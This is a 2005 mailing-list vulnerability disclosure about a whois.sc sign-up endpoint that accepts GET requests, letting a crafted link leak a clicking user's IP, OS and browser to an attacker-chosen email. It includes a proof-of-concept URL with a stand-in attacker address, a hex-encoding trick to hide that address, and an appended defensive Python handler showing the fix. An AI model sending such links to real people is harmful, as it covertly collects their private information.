Message-ID: <b7a807650511020853w7f9e1848g8de46f1a9159770a@mail.gmail.com>
Date: Wed Nov 2 20:01:21 2005
From: unknown.pentester at gmail.com (unknown unknown)
Subject: whois.sc not-big-deal hole
Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)
Description:
This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:
- IP Address
- Operating system
- Web browser version
This information can be easily obtained by "tricking" someone into visiting
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).
In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).
The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.
The original request to sign-up for an account is a POST request
*similar* to the following:
POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com
However we can change the request from POST to GET and the application
will happily process the query:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com
PoC:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com
Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".
Also, we could obfuscate our email address by encoding it to hex:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D
Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php
Regards,
pagvac
Earth, SOLAR SYSTEM
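The two weaknesses the post relies on are that a state-changing sign-up endpoint accepts the same parameters over GET (so a plain link can trigger it for whoever clicks) and that a notification sent to an unverified, attacker-chosen address carries the requester's IP, OS and browser. The handler below is an added example of how a server side would close both gaps; it is not whois.sc's code, and `Request`, `Response`, `issue_csrf_token` and `handle_newaccount` are hypothetical names.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class Request:
    method: str       # HTTP method
    query: dict       # parsed URL parameters (never trusted for this action)
    form: dict        # parsed POST body
    session: dict     # server-side session store for this client
    client_ip: str    # what the webserver log would record
    user_agent: str


@dataclass
class Response:
    status: int
    body: str = ""
    mail: Optional[dict] = None   # notification the app would queue (constructed, not sent)


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: stored server-side, and only the genuine form page echoes it back."""
    token = secrets.token_urlsafe(32)
    session["csrf"] = token
    return token


def handle_newaccount(req: Request) -> Response:
    # 1. Account creation changes state, so only POST is accepted; a GET link
    #    such as process.html?action=newaccount&email=... is refused outright.
    if req.method != "POST":
        return Response(405, "method not allowed")
    # 2. Parameters are read from the POST body only, and the body must carry the
    #    session-bound token, so a page on another site cannot submit on the user's behalf.
    expected = req.session.get("csrf", "")
    supplied = req.form.get("csrf", "")
    if not expected or not hmac.compare_digest(supplied, expected):
        return Response(403, "missing or invalid csrf token")
    req.session.pop("csrf")   # one-time use: a replayed form is rejected
    email = req.form.get("email", "")
    if "@" not in email:
        return Response(400, "bad email")
    # 3. The address is unverified, so the mail carries only an activation code;
    #    client_ip and user_agent stay in the server log and never reach the mailbox.
    code = secrets.token_urlsafe(16)
    mail = {"to": email, "body": f"Confirm your account: /members/activate?code={code}"}
    return Response(200, "pending activation", mail)
```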